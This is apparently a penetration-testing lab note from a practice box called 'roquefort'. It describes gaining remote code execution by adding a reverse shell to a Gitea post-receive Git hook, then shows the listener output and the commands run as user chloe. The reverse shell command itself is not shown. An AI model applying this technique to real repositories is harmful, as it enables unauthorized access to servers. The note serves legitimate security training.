InfoSec LAB

Git Hook RCE

In Gitea, Git Hooks are scripts that run automatically during repository events, and if an attacker gains write access, they can modify these scripts to execute malicious code. By injecting commands into a hook like post-receive, an attacker can trigger Remote Code Execution (RCE) when someone pushes code. This technique is common in platforms that integrate CI/CD features like Gogs, BitBucket, Jenkins, Travis CI, Azure DevOps, and GitLab, where automated processes often run with high privileges.

I will use the post-receive Git Hook

and add a reverse shell command

Then, I just need to make any change to the repository

Creating a new file. Upon clicking the Commit Changes button,

The post-receive Git Hook gets executed

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/roquefort]
└─$ nnc 2222
listening on [any] 2222 ...
connect to [192.168.45.249] from (UNKNOWN) [192.168.206.67] 35642
bash: cannot set terminal process group (747): Inappropriate ioctl for device
bash: no job control in this shell
chloe@roquefort:~/gitea-repositories/test/rce.git$ whoami
whoami
chloe
chloe@roquefort:~/gitea-repositories/test/rce.git$ hostname
hostname
roquefort
chloe@roquefort:~/gitea-repositories/test/rce.git$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:9e:15:1f brd ff:ff:ff:ff:ff:ff
    inet 192.168.206.67/24 brd 192.168.206.255 scope global ens192
       valid_lft forever preferred_lft forever

Initial Foothold established to the target system as the chloe user via exploiting Git Hooks

InfoSec LAB

Explorer

Roquefort_Exploitation_2

Git Hook RCE

Interactive Graph View

Backlinks